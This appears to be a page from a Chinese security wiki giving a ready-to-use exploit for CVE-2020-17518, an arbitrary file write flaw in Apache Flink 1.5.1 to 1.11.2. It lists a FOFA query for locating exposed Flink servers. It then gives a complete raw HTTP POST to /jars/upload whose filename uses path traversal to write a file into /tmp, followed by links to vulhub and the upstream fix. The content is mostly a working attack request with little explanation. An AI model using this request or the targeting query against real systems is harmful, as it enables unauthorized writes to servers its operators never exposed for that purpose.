menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right CVE-2020-17518 Apache Flink 任意文件写入.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    CVE-2020-17518 Apache Flink 任意文件写入.md
    849 B / 2021-05-21 09:14:38
        # CVE-2020-17518 Apache Flink 任意文件写入
    
    影响范围
    
    Apache Flink 1.5.1 ~ 1.11.2
    
    FOFA:
    
    ```
    app="APACHE-Flink" 
    ```
    
    
    ```bash
    POST /jars/upload HTTP/1.1
    Host: localhost:8081
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Connection: close
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
    Content-Length: 201
    
    ------WebKitFormBoundaryoZ8meKnrrso89R6Y
    Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/ywhack.txt"
    
    forum.ywhack.com
    ------WebKitFormBoundaryoZ8meKnrrso89R6Y--
    ```
    
    ref
    
    https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
    https://github.com/apache/flink/commit/a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4
    
    links
    file_download